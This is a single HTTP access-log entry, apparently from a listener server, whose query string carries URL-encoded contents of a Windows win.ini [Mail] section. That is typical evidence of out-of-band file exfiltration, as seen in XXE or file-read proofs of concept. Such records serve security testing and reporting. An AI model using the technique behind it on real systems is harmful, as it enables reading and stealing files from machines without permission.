13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 - \ No newline at end of file